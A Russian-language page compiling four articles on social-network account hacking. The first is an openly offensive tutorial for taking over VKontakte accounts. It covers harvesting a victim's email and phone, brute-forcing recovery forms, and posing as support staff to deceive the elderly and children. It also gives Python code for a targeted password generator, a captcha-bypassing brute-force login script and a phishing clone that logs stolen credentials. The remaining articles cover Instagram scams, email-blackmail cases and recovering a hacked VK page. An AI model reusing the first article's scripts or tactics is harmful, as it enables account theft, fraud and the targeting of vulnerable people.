Взлом страниц статья

Пошаговое руководство по взлому страницы ВКонтакте

Взлом страниц статья

В статье приводится несколько возможных способов взлома ВКонтакте, ориентированных на людей, недалёких в компьютерной безопасности.

Иными словами, при взломе будут использоваться не машинные, а человеческие уязвимости. Естественно, приведённые методы не универсальны (и слава богу!), и у кого-то может хватить мозгов на то, чтобы не поддаваться на ваши провокации.

Но таких не так уж много, поверьте. Итак, начнём. Прежде всего, перед началом вам понадобятся страница, которую вы собираетесь “хакнуть”, свободное время и безопасный доступ к ВКонтакте. Сам процесс взлома разделим на несколько шагов.

Прежде всего, нужно собрать как можно информации со страницы потенциальной жертвы, а именно:

    1. URL страницы.
      Сохраняем себе ID или, если там имеется буквенная замена, то ее. Аккаунты и другую нужную нам информацию, всякого рода твиттеры и тому подобное.
    2. Неплохо было бы заиметь почту цели.
      Если человек не только попал в сеть, вы сможете найти почту путем простого гугления. К примеру, особо удобно отыскивать почту на mail.ru. Также можно попробовать поискать Ф.И.О. цели и дату рождения. Или же другого рода такие комбинации. Если жертва имеет Мой Мир на mail, то почта будет в коде страницы или же в URL.

      В том случае, когда имеется почта без соц.сети от mail'a, почту можно выяснить, создав себе подставную почту на этом сервисе и поискав в мессенджере от мэйла. Как ещё один из способов, можно попробовать найти что-нибудь дельное с помощью аккаунтов цели в других социальных сетях.

      Например, попытаться пробить никнеймы из всех найденных аккаунтов по всем известным почтовым сервисам. Как вариант, можно попробовать использовать импорт почтовых контактов и предложение добавить этих людей в друзья. Регистрируем очередную фальшивую почту и получаем дополнительные аккаунты.

      Как альтернатива, можно попытать счастье, используя форму восстановления в 'е, таким образом узнав часть почты. В 'е можно напрямую поискать аккаунт, введя почту в поиск.

    3. Телефон.
      Так, URL и почту узнали, осталось достать номер телефона. Не считая тех случаев, когда номер висит в открытом доступе на странице в соц. сетях или в каких-то проектах (Avito/HeadHunter/Покупка или продажа недвижимости/Свой сайт/Другое), остаётся только один метод. Имеется почта пользователя на mail'е. Вводим ее в форму восстановления в ВКонтакте, и приходит часть номера. А теперь то же самое, но на mail. И если номер там привязан, то вы увидите уже другую, вторую часть номера. Если почта не привязана, то тогда там есть секретный вопрос. Перебираем его и заставляем юзера привязать мобилку на сервис. Отлично, осталась всего пара цифр от почты. Чтобы их узнать, достаточно перебрать форму восстановления ВКонтакте уже с помощью номера. Всего-то 99 раз. Можно и автоматизировать. Также в некоторых случаях люди любят публиковать свой номер на странице, но закрывать часть номера звездочками, черточками и прочей ерундой, что также может упростить процесс взлома. Если повезет, то вам будут видны именно те цифры, которые недоступны в форме восстановления вк.

На данном этапе мы будем пробовать получить доступ к аккаунту цели. Рассмотрим самые простые приёмы:

1) «Социнженер»

Здесь сразу нужно оговориться, что этот способ годиться только для тех, кто мало что знает об интернете, но решил по каким-либо причинам зарегистрироваться в соц.сети. Как правило, это либо старики, либо дети.

Если вы хотите просто попрактиковаться, то новички ВКонтакте могут быть найдены здесь.В данном случае, применяется один из законов психологии: человек, который не разбирается в чем-то, подсознательно доверяет тому, кто более опытен в конкретной области, и принимает его слова на веру.

Тут можно создать аккаунт представителя техподдержки, создать “официальную” почту администрации и прочее. И создать какую-нибудь легенду. Что новые пользователи обязаны проходить проверку после регистрации и дать, например, ссылку на некий тест, по итогу или для входа которого требуется логин-пасс от вк. Самое важное, чтобы вы действовали осторожно.

Следует убедить пользователя, что он в безопасности. Этот приём хорошо сочетается с фейком. Кроме того, продвинутые социнженеры могут, узнав номер юзера, позвонить (анонимно, используя sip) и развести напрямую.

Кроме того, вся указанная вами информация (номер телефона/упоминание фактов с указанием дат/другое) также помогает установить контакт с жертвой и косвенно говорит о том, что вы из техподдержки.

2) «Умный» перебор

Метод, рассчитанный на среднестатистических пользователей. Для него нам надо будет специальный словарь, заточенный под конкретного человека. Давайте разберёмся со структурой нашего словаря:

  • Личные данные. Сюда входят дата рождения (17.11.1992 = 1711, 1992, 17111992), возраст (1992, 2017 = 2017, 1992,  24), имя (Стас = stas, ctac) и фамилия (Иванов = ivanov).
  • Аккаунты из других соц. сетей и почтовые сервисы (.com/stasik_ku , .com/stasss1992, stasss92@mail.ru = stasik_iv, stasss1992, stasss92).
  • Увлечения (футбол, плавание, молодежка = football, swimming, molodejka, molodegka).

Также есть страница вк, на которой написано, какие пароли следует указывать, какие символы возможны и самые частые пароли.Получился лист из 14 строк. Но из него еще нужно создать комбинации паролей, которые могла бы создать наша жертва.

Представляю вам мой небольшой скрипт на python, который этим и занимается.

#! coding:utf-8 import sys,os razdel = ['_',':',';'] def uniq(seq): seen = set() seen_add = seen.add return [x for x in seq if not (x in seen or seen_add(x))] def brute_words(words): new_words = [] for i in words: new_words.append(i) new_words.append(i[0].upper() + i[1:]) new_words.append(i[0].upper() + i[1:-1] + i[-1].upper()) new_words.append(i.upper()) for j in spisok: new_words.append(i + j) for m in razdel: new_words.append(j + m + i) new_words.append(j + i) new_words.append(i * 2 + j) new_words.append(j * 2 + i) new_words.append(i[0].upper() + i[1:] + j) new_words.append(i[0].upper() + i[1:-1] + i[-1].upper() + j) return uniq(new_words) def generate(words_file): o = open(words_file, 'r') words = o.read().splitlines() for i in brute_words(words): print(i) def main(): try: argv1 = sys.argv[1] generate(argv1) except IndexError: print(“Нужно указать файл”) except IOError: print(“Нет такого файла”) if __name__ == “__main__”: main()

Из 14 получилось 1272 варианта. Приведу часть.

Molodegkactac MolodegkActac molodejka_molodegka Stasss92molodejka stasss92molodegka molodegka_stasss92 molodegka:stasss92 molodegka;stasss92 stasss1992swimming swimming_stasss1992 Kurayginctac KuraygiNctac kurayginkuraygin kuraygin_kuraygin molodegka17111992 1711199217111992molodegka molodegkamolodegka17111992 24 1711_24

Отлично, теперь автоматизируем перебор паролей через мобильную версию ВКонтакте небольшим скриптом.

#! coding: utf8 import grab, re, urllib2 from antigate import AntiGate from grab import GrabTimeoutError from time import sleep cap_key = '123 ' #Ваш ключ с Antigate def anti(key, file): #Получение решения Captcha с Antigate try: try: data = AntiGate(key, file) return data except KeyboardInterrupt: print(“Завершение”) except: anti(key, file) def save(url, file): #Скачивание файла по URL site = urllib2.urlopen(url) f = open(file, 'wb') f.write(site.read()) def cap_solve(img): save(img, 'captcha.jpg') key = anti(cap_key, 'captcha.jpg') return key def brute(login, passwords, save): out = open(save, 'w') psswrds = open(passwords,'r') try: int(login) prefix = True except: prefix = False g = grab.Grab() g.go('http://m..com') for line in psswrds: psswrd = line.rstrip('\r') g.doc.set_input('email', login) g.doc.set_input('pass', psswrd) g.doc.submit() if g.doc.text_search(u'captcha'): all_captchas = re.findall('”(/captcha.php[“]*)”', g.response.body)[0] captcha = '' + all_captchas key = cap_solve(captcha) g.doc.set_input('email', login) g.doc.set_input('pass', psswrd) g.doc.set_input('captcha_key', str(key)) g.doc.submit() print(“cap”) if 'Подтвердить' in g.response.body: if prefix: prefix1 = g.doc.rex_search('\+[0-9]*').group(0) prefix2 = g.doc.rex_search(' [0-9]*').group(0) pre1 = re.findall('[0-9]{1,}', prefix1)[0] pre2 = re.findall('[0-9]{1,}', prefix2)[0] login = login.replace(pre1, '') login = login.replace(pre2, '') g.set_input('code', login) g.submit() print(login + ':' + psswrd + '–success') out.write(login + ':' + psswrd + '') else: out.write(login + ':' + psswrd + '') else: if g.doc.rex_search('[>]+').group(0) == 'Login | ': print(login + ':' + psswrd + '–fail') else: print(login + ':' + psswrd + '–success') out.write(login + ':' + psswrd + '') out.close() psswrds.close()

Естественно, пример не оптимизирован. Можно ещё добавить прокси, многопоточность и прочие плюшки, но этим уже сами займётесь, если будет интересно. Зато скрипт способен сам вводить недостающие цифры в защиту ВКонтакте при заходе с другой страны, а также, используя Antigate, запросто вводит Captch'и, появляющиеся после 5-6 попытки ввода с одного IP.

3) «Фейк — наше все»

Способ, ориентированный на невнимательных юзеров. По большей части их либо завлекают халявой, либо отвлекают внимание с помощью многобукв. Я покажу вам, как создать простой фейк на основе обычного сайта вк (страницы логина).

Можете брать как мобильную, так и основную версии, зависит от того, с какого устройства будет заходить ваша цель. Что ж, приступим.
Первым делом качаем страницу логина вк через ваш браузер. Затем смените кодировку html файла на utf-8.

Сначала определяем кодировку

file –mime-encoding file.html

Затем меняем с исходной на новую

iconv -f iso-8859-1 -t utf-8 file.html > 2.html

Далее вам нужно создать управление страницей на серверном языке.

@route('/') def index(): return template('2.html') @route('/Welcome! | _files/') def server_static(filepath): return static_file(filepath, root='./Welcome! | _files/')

Как выяснилось, на кое-каких файлах порой выдаётся ошибка 404. У нас, к сожалению, не имеется нужных картинок с сайта, так что положим их в отдельную папку images.

mkdir images cd images wget wget “” wget “” mkdir icons cd icons wget “” wget “”

Пропишем новый роутинг в скрипте.

@route('/images/') def server_static(filepath): return static_file(filepath, root='./images/')

Отлично.

Конечно, по-хорошему надо было бы ещё также скачать основные страницы, на которые можно перейти с основной не залогинившись, чтобы было правдоподобней (а потом поменять ссылки в основной), но для начала и этого хватит.
Добавим роутинг для пост запроса. Найдем форму логина на странице. Изменим в ее коде action на пустое и удалим проверку onsubmit. И добавим обработку post-запроса.
@post('/') def index(): login = request.forms.get('email') password = request.forms.get('pass') print(“|Catch|————– ” + login + ':' + password) with open(“log.txt”, “a”) as myfile: myfile.write(login + ':' + password + “”) return redirect('http://www..com')

В заключении, переносим тег button, что под формой в коде в пределы формы и добавляем свойство type=”submit”, и наслаждаемся тем, что всё работает. Для тех, у кого что-то не получилось, представляем архив с готовым решением.

Если вы желаете оптимизировать этот процесс и не хотите прописывать всё это ручками, то можете воспользоваться инструментом SET. (Social Engineer Toolkit).

Другие материалы по теме:

10 лучших ресурсов для изучения хакинга с помощью Kali Linux
5 лучших Android приложений для взлома Wi-Fi сетей
10 лучших инструментов для хакинга в 2017 году

Источник: https://proglib.io/p/vk-hacking/

Взломать – раз плюнуть: как спасти свой аккаунт от мошенников в соцсетях

Взлом страниц статья

Продвинутые пользователи Instagram давно зарабатывают на своих аккаунтах. А на продвинутых (и не очень) пользователях, в свою очередь, зарабатывают мошенники. Москва 24 рассказывает о самых распространенных и новых хитростях злоумышленников в соцсети и о том, что делать, если они добрались до вашего профиля.

depositphotos/diego_cervo

Блогеры тоже плачут

“Поздравляю! Вам хотят сделать галочку в Instagram”, “предотвратим взлом страницы”, “предлагаем сотрудничество” – за нехитрыми фразами, как правило, и скрываются мошенники. Особенно эти товарищи докучают блогерам и предпринимателям.

Недавно стилист и блогер Елизавета Белая (около 82 тысяч подписчиков) в своем профиле опубликовала историю, в которой предупредила о новой форме мошенничества: “Не верьте таким сообщениям в директ. Ваш аккаунт уведут.

Сообщаю для вашей безопасности”.

Москве 24 девушка рассказала, что от взломщиков, которые так и норовят нажиться на чужом труде, нет отбоя. Уже однажды наученная опытом, Елизавета не поддается на подобные провокации.

“Год назад меня взламывали самым глупым образом: через предложение о сотрудничестве. На почту пришло письмо со ссылкой, я перешла по ней и по незнанию ввела пароль и логин от аккаунта. После меня неделю шантажировали удалением, но я игнорировала.

В итоге мне ответила техническая поддержка сети и помогла решить проблему”, – рассказывает она.

Тогда, по словам Елизаветы, у нее попросили около семи тысяч рублей: можно сказать, блогеру повезло, ведь вымогают и куда более внушительные суммы. Некоторые готовы заплатить сколько угодно, лишь бы вернули их аккаунт, который является основным средством заработка.

Взломать – раз плюнуть

Мошенническим атакам подвергаются почти все пользователи соцсетей. Правда, цели у злоумышленников разные: если взламывают простых пользователей, то делают рассылку с просьбой дать денег в долг. Если же мошенники взяли в оборот известных блогеров с большой аудиторией, то в ход идет шантаж на крупные суммы.

Самый распространенный способ “угона” любого аккаунта – брутфорс. С помощью специальной программы мошенник подбирает нужный пароль к аккаунту “жертвы” из тысячи заранее заготовленных вариантов. Чтобы не попасться под горячую руку, установите сложный пароль: используйте заглавные и строчные буквы, специальные символы и цифры.

Желательно, чтобы он состоял из десяти и более символов.

Письма счастья

Излюбленная стратегия инстаграмных мошенников – фишинг. Наверное, каждому приходило сообщение с адресом какого-нибудь сайта.

Аргументы в пользу того, почему обязательно нужно кликнуть по ссылке, типичны: “заходи и узнай количество ботов в твоем аккаунте” или “тут про тебя такое пишут”. Как только человек переходит на указанный ресурс, ему предлагают авторизоваться через Instagram: ввести свой логин и пароль.

После этого все данные отсылаются мошеннику, и уже через несколько минут пароль аккаунта будет изменен. Вернуть его, конечно же, предложат за вознаграждение.

“Письмо счастья” может прилететь и на почту, к которой привязан аккаунт. типично – мошенники пишут, что профиль пытались взломать и в целях безопасности лучше сменить пароль. Дальше – стандартная схема: пользователь переходит по ссылке, попадает на сайт, похожий на привычную соцсеть, и оказывается в западне.

Если на почту пришло письмо якобы от Instagram, внимательно прочитайте адрес отправителя и убедитесь, что он верный. Официальная почта имеет адрес no-reply@mail.instagram.com. В любом случае лучше сразу сменить пароль, воспользовавшись кнопкой “забыл пароль”.

depositphotos/REDPIXEL

Многие мечтают о синенькой галочке возле своего ник-нейма. Таким знаком отличия (верификацией) обладают аккаунты знаменитостей и крупных компаний.

В получении галочки особенно заинтересованы профили с большой аудиторией, ведь она добавляет престижа и помогает бороться с фейками.

Если раньше “птичку” заполучить было трудно, то теперь можно запросить верификацию прямо из приложения. И если аккаунт удовлетворяет всем необходимым критериям, вы ее получаете.

Для получения верификации аккаунт должен соответствовать Пользовательскому соглашению и Руководству сообщества в Instagram, а также представлять реального человека либо зарегистрированную компанию; быть уникальным – единственный в своем роде; общедоступным с биографией, фото профиля и хотя бы одной публикацией; аккаунт не должен содержать ссылки из серии “добавь меня”; аккаунт должен быть заметным – представлять известного человека, бренд, который часто ищут в поисковиках или о нем регулярно упоминается в новостях.

Такое нововведение мошенники решили использовать для себя: они создают сайты, иногда ювелирно замаскированные под страницы справочного центра соцсети, запрашивают логин и пароль, адрес электронной почты, фамилию, имя, дату рождения.

И обещают по этим данным верифицировать аккаунт. Пользователь вводит необходимую информацию на сайте-подделке, но верификации так и не дожидается.

Предложить “галочку” могут и по почте, прислав пользователю письмо с предложением, – здесь тоже надо смотреть в оба.

Боты атакуют

Одним из распространенных вариантов “угона” аккаунта является массовая спам-атака: в Сети создают фейковые аккаунты, которые жалуются на профиль пользователя.

Реакция соцсети проста – атакуемый аккаунт быстро блокируют. И тут же появляются “предприниматели”, готовые решить проблему за 20–30 тысяч рублей.

Такому виду мошенничества чаще всего подвергаются блогеры с тысячной и миллионной аудиторией.

Виноваты сами

Один пароль и логин во всех социальных сетях – знакомая история? Не придумывать новые комбинации проще, ведь если вводить везде одни и те же данные, то риска их забыть нет. Лень – то, на чем пользователей ловят мошенники.

Одинаковые комбинации цифр и букв используются не только в соцсетях, но и на различных сайтах и форумах. В один прекрасный день их могут попросту взломать, и данные тут же попадают в руки мошенников.

А дальше специально созданные боты подбирают полученные “ключи” к остальным аккаунтам и сайтам.

depositphotos/PirenX

Лучше предотвратить

Директор Ассоциации профессиональных пользователей соцсетей и мессенджеров Владимир Зыков рассказал Москве 24, как не попасться в сети злоумышленников.

Он уверен, что самая простая защита – двухфакторная авторизация, которую лучше использовать всем. “В 99 процентах случаев она защищает от подобного рода вещей.

Подразумевается, что при входе в соцсеть, кроме логина и пароля, вы вводите еще и код, который приходит на телефон сообщением”, – поясняет он.

Конечно, если против вас устроена специальная атака, то даже двухфакторная авторизация не спасет, ведь мошенники могут выпустить дубликат вашей сим-карты.

Но на каждое действие мошенников есть ответ: можно подключить авторизационный код.

В этом случае нужно вводить комбинацию не из СМС, а из специального приложения, которое генерирует код (приложение есть у крупнейших поисковых систем).

Если избежать мошенничества не удалось, ни в коем случае не стоит платить вымогателям деньги “за возвращение аккаунта”. Лучше обратиться в техническую поддержку Instagram.

Чем больше мы платим мошенникам, тем больше и лучше они развивают способы мошенничества, улучшают техническое оснащение, увеличивают охват людей, которые подвергаются атакам.

Владимир Зыков

директор Ассоциации пользователей соцсетей и мессенджеров

Не стать жертвой мошенников поможет соблюдение минимальных правил безопасности. Правило номер один: использовать только официальное приложение для входа в соцсеть.

Номер два: не переходить по ссылкам, которые присылают в директ (особенно это касается ссылок от незнакомцев). Правило номер три: обязательно проверять адресную строку. Корректный адрес соцсети – Instagram.

com, а мошенники часто меняют первую букву или добавляют символы или цифры. Внимание, память и богатая фантазия при составлении паролей – и ваши аккаунты в безопасности.

Илона Соболева

Источник: https://www.m24.ru/articles/tehnologii/18092019/155989

Сколько стоит взломать переписку и как защититься

Взлом страниц статья

Фото istock

Цены на взлом стартуют всего от 100 долларов

Взлом электронной почты и шантаж содержимым писем стали в Украине “модными”. Как стало известно “Вестям”, одна группировка аферистов-вымогателей пыталась даже “окрутить” нардепа и адвоката. Но, как говорят киберполицейские, большая часть таких историй до них даже не доходит. 

Нетайная переписка адвоката

В том, что переписка с помощью любых электронных носителей небезопасна, убедился адвокат из Харькова, который сегодня участвует в процессе по одному резонансному убийству.

Как рассказал “Вестям” один из правоохранителей, этим летом юрист получил сообщение через мессенджер WhatsApp от неизвестного, в котором говорилось о том, что его переписка с клиентом попала в их руки и будет обнародована. Если же он не хочет, чтобы это произошло, может откупиться.

А в качестве доказательства звонивший выслал копии электронных писем. Так как адвокат не ответил, в следующем сообщении неизвестный уже напрямую угрожал, что если адвокат не найдет денег, то его переписка с клиентом станет достоянием общественности.

А это уже нарушение адвокатской тайны, хотя и не по вине самого защитника.

Адвокату была назначена встреча в Кропивницком, но он на нее не пришел. Вместо него прибыла группа крепких мужчин, которые избили парламентера за то, что он, дескать, не придерживается инструкций нанимателей.

После такого посредник сам побежал в полицию писать заявление на своих обидчиков и по ходу дела рассказал полицейским о причине нападения. Как рассказал потерпевший, его попросил вести переговоры с адвокатом знакомый, за что пообещал тысячу долларов.

Но после нападения на него парламентер испугался и решил сдаться.

“Пострадавший адвокат нам рассказал, что его электронную почту не раз пытались взломать. И где-то с 2016 года начали появляться материалы переписки якобы с его электронной почты, но они все, по его словам, были подделкой”, — рассказали “Вестям” в следствии.

Очень похожая история, как выяснилось, произошла с экс-народным депутатом Александром Грановским.

В прошлом году уроженец Харькова вымогал полмиллиона долларов у него за нераспространение сведений, которые могли бы серьезно подпортить его репутацию.

Речь о продаже столичного торгового центра SkyMall и Одесского припортового завода. И якобы письма были получены со взломанной электронной почты, но немного подправлены.

По данным следствия, в начале мая нардеп на WhatsApp получил копии как реальных его писем, так и поддельных. А 14 мая в гостинице “Русь” злоумышленник выдвинул Грановскому требование передать 500 тыс.

долларов за неразглашение переписки. Депутат согласился и попросил несколько дней на сбор необходимой суммы наличных.

А 15 мая на АЗС в Броварах шантажист получил от Грановского сумку с деньгами и был задержан.

В прошлом году состоялся суд, который приговорил вымогателя к пяти годам лишения свободы, но освободил от наказания с испытательным сроком в два года, потому что обвиняемый вину признал.

Вот только своих сообщников он не сдал, потому что уверяет, что не знает их.

Он только рассказал о том, что в 2015 году познакомился с мужчиной по имени Михаил, и тот рассказал, что он с друзьями взламывает электронные почтовые ящики, отбирает интересности, а потом они шантажируют их владельцев.

“Легкий способ заработать его заинтересовал, и новые друзья обучили его тому, как можно незаконно заходить на различные электронные ящики и получать с них данные, а также какое программное обеспечение для этого нужно. Он покупал для таких целей электронные приборы и оборудование.

Как оказалось, эти люди настроили автоматическую переадресацию корреспонденции с избранных электронных адресов на собственноручно созданные ими электронные ящики на mail.ru.

После этого они же проводили некоторые манипуляции с текстами электронных писем — меняли их содержание, создавали новые письма, заменяли вложенные файлы и тому подобное.

Тогда же он узнал, что Михаил с товарищами длительное время следят за электронной перепиской Грановского, который пользуется мобильным приложением WhatsApp. Выполнить роль посредника в деле шантажа и передачи денег они поручили новичку”, — рассказал “Вестям” один из сотрудников прокуратуры.

Как взламывают почты

Как ни странно, но ниточки по делу Грановского вели в Харьков. По такому же сценарию шантажировали перепиской и адвоката. По сути, полицейские предположили, что действуют одни и те же лица. Но выйти на их след не удалось. Точнее, след Михаила пропал.

Что интересно, так это то, что проведенные экспертизы не могли подтвердить подлинность писем, которые фигурировали в деле, так же, как и их подделку. Эксперт только доказал, что можно легко заменить письмо.

Он загрузил его на свой компьютер, изменил и выгрузил обратно в почту таким образом, что для обычного пользователя изменения являются незаметными.

Как рассказал “Вестям” специалист в сфере IT-технологий Сергей Вороненко, не обязательно самому заниматься взломом электронной почты. Поисковик выдает 50 млн результатов по этому запросу. И цены стартуют всего от $100.

“Уверен, что хакерам заказали почту адвоката и депутата. Но что-то пошло не так, возможно, заказчик передумал, и ребята, чтобы не терять деньги, решили действовать самостоятельно. Сами пошли на шантаж. Но так как опыта было мало — операция провалилась”, — говорит Вороненко.

Методов работы хакеров масса — начиная от подбора пароля и запуска вируса. Но самый распространенный — с помощью фишинга. К примеру, на электронный ящик может прийти письмо от МВД о штрафе. Нажав кнопку “подтвердить”, вы попадете на фейковую страницу, где предложат ввести логин и пароль электронного ящика. Так конфиденциальные данные уходят к злоумышленникам.

“Часто взламывают не почтовый ящик, а весь компьютер пользователя, например, с помощью адресной засылки с трояном. Это скриншоты не веб-интерфейса, а почтовой программы. То есть, возможно, доступ был получен не к аккаунту на сервере, а к локальной копии данных, хранящейся на компьютере жертвы”, — рассказывает Сергей Вороненко.

К слову, совсем недавно в Харькове вышли на след группы хакеров, которые занимались взломом электронных почтовых ящиков и аккаунтов в соцсетях. Правоохранители провели обыски, изъяли технику. Но есть ли среди задержанных тот загадочный Михаил, который шантажировал депутата и, возможно, был причастен к вымогательству денег у адвоката, выясняет следствие.

Источник: https://vesti.ua/strana/sygraem-v-yashhik-kak-hakery-ohotyatsya-za-perepiskoj

Что делать, если взломали страницу ВКонтакте – пошаговая инструкция

Взлом страниц статья

Здравствуйте, друзья.

Социальная сеть ВКонтакте стала для нас виртуальным домом, а для некоторых еще и офисом. Здесь мы делимся своими новостями, встречаемся и общаемся с друзьями, работаем.

Но бывают досадные случаи, когда вдруг профиль блокируют, или его захватывают злоумышленники. И нам хочется как можно быстрее вернуть контроль над ним.

Поэтому сегодня поговорим на серьезную тему и узнаем, что делать, если взломали страницу в ВК. 

Как распознать взлом

Аккаунт взломан – значит, кто-то или что-то кроме вас знает логин и пароль. Это может быть человек или вирусная программа. Есть 3 случая, по которым вы поймете, что вас взломали в ВК:

  1. Вы замечаете, что с аккаунта совершались действия, которых вы не делали: поставлены лайки, сделаны репосты, в друзьях появляются незнакомцы, которых вы не добавляли.
  2. Заходя на страницу, вы видите сообщение о том, что она заблокирована.
  3. Вы вводите свой логин и пароль, но не можете зайти в профиль.

Разберем эти случаи отдельно и решим, как вести себя в каждом из них. Но для начала нужно знать, чего делать не стоит.

Неверные действия при взломе страницы

Самая первая ошибка в такой ситуации – это паника. Вы начинаете волноваться и делать поспешные и необдуманные шаги. Нужно успокоиться и, следуя пошаговой инструкции, постараться вернуть себе управление профилем.

Важно! Не создавайте новый аккаунт с привязкой к тому же номеру телефона или электронному ящику. Это очень затруднит процедуру восстановления контроля над учетной записью. Если регистрируете нового пользователя ВКонтакте, укажите другой телефон и адрес почты.

Что делать, если страница взломана, но вы можете на нее зайти

Может быть так, что вы заходите в свой профиль и видите необычные изменения, которых вы не делали: новые друзья, записи на стене, репосты, лайки. Это значит, что в вашем “виртуальном доме” хозяйничает чужой человек или вирусная программа.

Чтобы убедиться в этом, зайдите в настройки, нажав на маленькую аватарку в верхнем правом углу экрана. Идите в раздел «Безопасность» и проверьте историю активности.

Скорее всего, в открывшемся списке вы увидите незнакомый адрес и другой браузер, которым вы не пользуетесь.

Чтобы лишить злоумышленника доступа к вашим данным, не теряя времени, проделайте следующие действия:

1. Отключите компьютер от интернета и проведите его полное сканирование антивирусной программой. Если данные от ВК использует вирус, при смене пароля вредоносный код тут же получит и его.

2. В настройках безопасности завершите все сеансы. Таким образом, активным останется только ваш последний вход в учетную запись.

3. Теперь идем в раздел общих настроек.

4. Здесь проверяем, не подключен ли к странице еще один номер телефона или электронный ящик. Если так и есть – нужно удалить.

5. Затем меняем пароль, нажав на слово «Изменить» рядом с соответствующим полем.

6. Также администрация ВКонтакте рекомендует поменять данные от электронной почты и других привязанных к ВК аккаунтов.

Это основные шаги. После них проверьте, не пропали ли важные данные со страницы. Если есть потери, обратитесь к администрации, чтобы вернуть их. Для этого перейдите на .com/help и подробно опишите проблему.

Также предупредите друзей о том, что страница была взломана, и последние сообщения могли отправить не вы, а злоумышленники.

Что делать, если взломщики сменили логин и пароль

Злоумышленники стараются сразу сменить данные для входа во взломанном профиле. Тогда получить доступ к нему можно через восстановление пароля.

В открывшемся окне вводим свой телефон или email, который привязан к аккаунту ВКонтакте. Если к ним нет доступа, или вы их забыли, идите по подсказкам дальше.

Теперь нужно указать адрес своей страницы. Если вы его не знаете, воспользуйтесь поиском или зайдите через другую учетную запись: свою или друга. Продолжайте следовать инструкциям, подробно ответьте на все вопросы, и тогда есть все шансы вернуть управление профилем.

Если ничего не получилось, обратитесь в поддержку социальной сети по ссылке .com/help из учетной записи родственника или товарища, который есть у вас в друзьях в ВК. Подробно опишите проблему, вам ответят.

Что делать, если страница заблокирована

Если был осуществлен взлом, и от вашего лица мошенники рассылали письма и спам, то, вероятнее всего, администрация заблокирует профиль. Это стандартная процедура – когда появляется странная активность, система фиксирует попытку взлома, или пользователи жалуются на спам и другие нарушения правил ВКонтакте. Тогда ваши друзья увидят вот такую красоту, вместо вашей физиономии.

Но есть опасность, что вы находитесь на «подставном» сайте, куда вас направляет вирус при попытке зайти в ВК. Делается это, чтобы украсть данные. Внимательно посмотрите на адрес в строке браузера.

Он должен начинаться на “https://.com”. А дальше идет id вашей страницы.

Что будет, если ввести свои данные на другом сайте? Естественно, их тут же украдут и тогда уж точно взломают ваш профиль во ВКонтакте.

Чтобы убедиться, что страница заблокирована, попробуйте зайти на нее с другого компьютера или телефона. Желательно, чтобы они были подключены к другой сети.

Если вход успешно осуществляется, нужно на своем устройстве запустить полное сканирование антивирусом, предварительно отключив компьютер от интернета. Если программа ничего не нашла, обновите ее или установите дополнительную защиту.

Если вы убедились, что страница официально заблокирована, ее можно восстановить. Процедура схожа с той, что была описана выше. Вам нужно ввести телефон, к которому привязан профиль, и придумать новый пароль или обратиться в службу поддержки.

Удаление аккаунта

Удалить свой профиль можно только после того, как вы вернете контроль над ним. Если вы боитесь, что злоумышленники снова украдут данные, можете на время удалить страницу. Для этого зайдите в настройки и внизу нажмите на соответствующую надпись.

Источник: https://iklife.ru/socialnye-seti/vkontakte/chto-delat-esli-vzlomali-stranicu-v-vk.html

Поделиться:
Нет комментариев

    Добавить комментарий

    Ваш e-mail не будет опубликован. Все поля обязательны для заполнения.